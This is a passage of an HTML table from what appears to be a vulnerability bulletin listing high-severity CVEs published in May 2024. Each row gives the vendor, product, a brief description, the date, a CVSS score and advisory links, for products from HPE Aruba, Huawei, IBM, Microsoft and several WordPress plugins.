<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31474" target="_blank">CVE-2024-31474</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>There is an arbitrary file deletion vulnerability in the Central Communications service accessed by PAPI (Aruba's access point management protocol). Successful exploitation of this vulnerability results in the ability to delete arbitrary files on the underlying operating system, which could lead to the ability to interrupt normal operation and impact the integrity of the affected Access Point.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31475&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31475" target="_blank">CVE-2024-31475</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>Multiple authenticated command injection vulnerabilities exist in the command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31476&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31476" target="_blank">CVE-2024-31476</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Hewlett Packard Enterprise (HPE)--Aruba InstantOS and Aruba Access Points running ArubaOS 10<br> </td>
<td>Multiple authenticated command injection vulnerabilities exist in the command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31477&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31477" target="_blank">CVE-2024-31477</a><br><a href="https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-006.txt" target="_blank">security-alert@hpe.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Race condition vulnerability in the binder driver module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32997&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32997" target="_blank">CVE-2024-32997</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Privilege escalation vulnerability in the PMS module Impact: Successful exploitation of this vulnerability may affect service confidentiality.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-52719&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52719" target="_blank">CVE-2023-52719</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Permission verification vulnerability in the wpa_supplicant module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32991&amp;vector=CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32991" target="_blank">CVE-2024-32991</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>Huawei--HarmonyOS<br> </td>
<td>Insufficient verification vulnerability in the baseband module Impact: Successful exploitation of this vulnerability will affect availability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32992&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32992" target="_blank">CVE-2024-32992</a><br><a href="https://consumer.huawei.com/en/support/bulletin/2024/5/" target="_blank">psirt@huawei.com</a><br><a href="https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202405-0000001902628049" target="_blank">psirt@huawei.com</a></td>
</tr>
<tr>
<td>IBM--AIX<br> </td>
<td>IBM AIX could 7.2, 7.3, VIOS 3.1, and VIOS 4.1 allow a non-privileged local user to exploit a vulnerability in the invscout command to execute arbitrary commands. IBM X-Force ID: 283985.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27260&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27260" target="_blank">CVE-2024-27260</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/283985" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7152543" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--Security Guardium<br> </td>
<td>IBM Security Guardium 11.3, 11.4, 11.5, and 12.0 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. IBM X-Force ID: 271524.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47709&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47709" target="_blank">CVE-2023-47709</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/271524" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150840" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--Security Guardium<br> </td>
<td>IBM Security Guardium 11.3, 11.4, 11.5, and 12.0 could allow a local user to gain elevated privileges on the system due to improper permissions control. IBM X-Force ID: 271527.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47712&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47712" target="_blank">CVE-2023-47712</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/271524" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7150840" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IBM--i<br> </td>
<td>IBM i 7.2, 7.3, and 7.4 could allow a remote attacker to execute arbitrary code leading to a denial of service of network ports on the system, caused by the deserialization of untrusted data. IBM X-Force ID: 287539.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31879&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31879" target="_blank">CVE-2024-31879</a><br><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/287539" target="_blank">psirt@us.ibm.com</a><br><a href="https://www.ibm.com/support/pages/node/7154380" target="_blank">psirt@us.ibm.com</a></td>
</tr>
<tr>
<td>IOSS--WP MLM Unilevel<br> </td>
<td>Improper Privilege Management vulnerability in IOSS WP MLM Unilevel allows Privilege Escalation.This issue affects WP MLM Unilevel: from n/a through 4.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-51476&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-51476" target="_blank">CVE-2023-51476</a><br><a href="https://patchstack.com/database/vulnerability/wp-mlm/wordpress-wp-mlm-unilevel-plugin-4-0-unauthenticated-account-takeover-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>InstaWP Team--InstaWP Connect<br> </td>
<td>Improper Privilege Management vulnerability in InstaWP Team InstaWP Connect allows Privilege Escalation.This issue affects InstaWP Connect: from n/a through 0.1.0.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22145&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22145" target="_blank">CVE-2024-22145</a><br><a href="https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-8-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>J.N. Breetvelt a.k.a. OpaJaap--WP Photo Album Plus<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus.This issue affects WP Photo Album Plus: from n/a through 8.7.01.001.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31377&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">10</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31377" target="_blank">CVE-2024-31377</a><br><a href="https://patchstack.com/database/vulnerability/wp-photo-album-plus/wordpress-wp-photo-album-plus-plugin-8-7-01-001-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>JR King/Eran Schoellhorn--WP Masquerade<br> </td>
<td>Improper Privilege Management vulnerability in JR King/Eran Schoellhorn WP Masquerade allows Privilege Escalation.This issue affects WP Masquerade: from n/a through 1.1.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33550&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33550" target="_blank">CVE-2024-33550</a><br><a href="https://patchstack.com/database/vulnerability/wp-masquerade/wordpress-wp-masquerade-plugin-1-1-0-authenticated-account-takeover-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>JS Help Desk--JS Help Desk Best Help Desk &amp; Support Plugin<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in JS Help Desk JS Help Desk - Best Help Desk &amp; Support Plugin allows Using Malicious Files.This issue affects JS Help Desk - Best Help Desk &amp; Support Plugin: from n/a through 2.7.7.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-25444&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-25444" target="_blank">CVE-2023-25444</a><br><a href="https://patchstack.com/database/vulnerability/js-support-ticket/wordpress-js-help-desk-best-help-desk-support-plugin-plugin-2-7-7-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Jordy Meow--AI Engine: ChatGPT Chatbot<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine: ChatGPT Chatbot: from n/a through 2.2.63.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34440&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34440" target="_blank">CVE-2024-34440</a><br><a href="https://patchstack.com/database/vulnerability/ai-engine/wordpress-ai-engine-plugin-2-2-63-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Joseph C Dolson--My Tickets<br> </td>
<td>Missing Authorization vulnerability in Joseph C Dolson My Tickets.This issue affects My Tickets: from n/a through 1.9.11.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-23988&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-23988" target="_blank">CVE-2023-23988</a><br><a href="https://patchstack.com/database/vulnerability/my-tickets/wordpress-my-tickets-plugin-1-9-11-payment-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>JumpDEMAND Inc.--ActiveDEMAND<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in JumpDEMAND Inc. ActiveDEMAND allows Using Malicious Files.This issue affects ActiveDEMAND: from n/a through 0.2.41.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32809&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">10</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32809" target="_blank">CVE-2024-32809</a><br><a href="https://patchstack.com/database/vulnerability/activedemand/wordpress-activedemand-plugin-0-2-41-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Kioware--Kioware<br> </td>
<td>KioWare for Windows (versions all through 8.34) allows to escape the environment by downloading PDF files, which then by default are opened in an external PDF viewer. By using built-in functions of that viewer it is possible to launch a web browser, search through local files and, subsequently, launch any program with user privileges.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3459&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3459" target="_blank">CVE-2024-3459</a><br><a href="https://cert.pl/en/posts/2024/04/CVE-2024-3459" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/posts/2024/04/CVE-2024-3459" target="_blank">cvd@cert.pl</a><br><a href="https://www.kioware.com/" target="_blank">cvd@cert.pl</a></td>
</tr>
<tr>
<td>Kioware--Kioware<br> </td>
<td>In KioWare for Windows (versions all through 8.34) it is possible to exit this software and use other already opened applications utilizing a short time window before the forced automatic logout occurs. Then, by using some built-in function of these applications, one may launch any other programs.  In order to exploit this vulnerability external applications must be left running when the KioWare software is launched. Additionally, an attacker must know the PIN set for this Kioware instance and also slow down the application with some specific task which extends the usable time window.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3460&amp;vector=CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3460" target="_blank">CVE-2024-3460</a><br><a href="https://cert.pl/en/posts/2024/04/CVE-2024-3459" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/posts/2024/04/CVE-2024-3459" target="_blank">cvd@cert.pl</a><br><a href="https://www.kioware.com/" target="_blank">cvd@cert.pl</a></td>
</tr>
<tr>
<td>Kognetiks--Kognetiks Chatbot for WordPress<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in Kognetiks Kognetiks Chatbot for WordPress.This issue affects Kognetiks Chatbot for WordPress: from n/a through 2.0.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32700&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">10</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32700" target="_blank">CVE-2024-32700</a><br><a href="https://patchstack.com/database/vulnerability/chatbot-chatgpt/wordpress-kognetiks-chatbot-for-wordpress-plugin-2-0-0-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>LWS--LWS Affiliation<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in LWS LWS Affiliation allows PHP Local File Inclusion.This issue affects LWS Affiliation: from n/a through 2.2.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-32297&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-32297" target="_blank">CVE-2023-32297</a><br><a href="https://patchstack.com/database/vulnerability/lws-affiliation/wordpress-lws-affiliation-plugin-2-2-6-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Lenderd--1003 Mortgage Application<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Lenderd 1003 Mortgage Application allows Relative Path Traversal.This issue affects 1003 Mortgage Application: from n/a through 1.75.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2022-45368&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-45368" target="_blank">CVE-2022-45368</a><br><a href="https://patchstack.com/database/vulnerability/1003-mortgage-application/wordpress-1003-mortgage-application-plugin-1-73-local-file-inclusion?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Lenovo--Printers<br> </td>
<td>A buffer overflow vulnerability was identified in some Lenovo printers that could allow an unauthenticated user to trigger a device restart by sending a specially crafted web request.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3286&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3286" target="_blank">CVE-2024-3286</a><br><a href="https://iknow.lenovo.com.cn/detail/421500" target="_blank">psirt@lenovo.com</a><br><a href="https://www.lenovoimage.com/psirt/notice/158605.html" target="_blank">psirt@lenovo.com</a></td>
</tr>
<tr>
<td>MSI--MSI Afterburner<br> </td>
<td>MSI Afterburner v4.6.6.16381 Beta 3 is vulnerable to an ACL Bypass vulnerability in the RTCore64.sys driver, which leads to triggering vulnerabilities like CVE-2024-1443 and CVE-2024-1460 from a low privileged user.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3745&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3745" target="_blank">CVE-2024-3745</a><br><a href="https://fluidattacks.com/advisories/gershwin/" target="_blank">help@fluidattacks.com</a><br><a href="https://forums.guru3d.com/threads/msi-ab-rtss-development-news-thread.412822/page-227#post-6231456" target="_blank">help@fluidattacks.com</a><br><a href="https://forums.guru3d.com/threads/msi-ab-rtss-development-news-thread.412822/page-227#post-6231768" target="_blank">help@fluidattacks.com</a></td>
</tr>
<tr>
<td>MainWP--MainWP Code Snippets Extension<br> </td>
<td>Improper Control of Generation of Code ('Code Injection') vulnerability in MainWP MainWP Code Snippets Extension allows Code Injection.This issue affects MainWP Code Snippets Extension: from n/a through 4.0.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-23645&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-23645" target="_blank">CVE-2023-23645</a><br><a href="https://patchstack.com/database/vulnerability/mainwp-code-snippets-extension/wordpress-mainwp-code-snippets-extension-plugin-4-0-2-subscriber-arbitrary-php-code-injection-execution-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Masteriyo--LMS<br> </td>
<td>Improper Privilege Management vulnerability in Masteriyo LMS allows Privilege Escalation.This issue affects LMS: from n/a through 1.7.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-24882&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-24882" target="_blank">CVE-2024-24882</a><br><a href="https://patchstack.com/database/vulnerability/learning-management-system/wordpress-lms-by-masteriyo-plugin-1-7-2-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Microsoft--Azure Monitor<br> </td>
<td>Azure Monitor Agent Elevation of Privilege Vulnerability</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30060&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30060" target="_blank">CVE-2024-30060</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30060" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Dynamics 365<br> </td>
<td>Dynamics 365 Customer Insights Spoofing Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30047&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30047" target="_blank">CVE-2024-30047</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30047" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Dynamics 365<br> </td>
<td>Dynamics 365 Customer Insights Spoofing Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30048&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30048" target="_blank">CVE-2024-30048</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30048" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Microsoft SharePoint Enterprise Server 2016<br> </td>
<td>Microsoft SharePoint Server Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30044&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30044" target="_blank">CVE-2024-30044</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30044" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Office Online Server<br> </td>
<td>Microsoft Excel Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30042&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30042" target="_blank">CVE-2024-30042</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30042" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30006&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30006" target="_blank">CVE-2024-30006</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30006" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30009&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30009" target="_blank">CVE-2024-30009</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30009" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Hyper-V Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30017&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30017" target="_blank">CVE-2024-30017</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30017" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Windows Cryptographic Services Remote Code Execution Vulnerability</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30020&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30020" target="_blank">CVE-2024-30020</a><br><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30020" target="_blank">secure@microsoft.com</a></td>
</tr>
<tr>
<td>Microsoft--Windows 10 Version 1809<br> </td>
<td>Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability</td>
<td>2024-05-14</td>
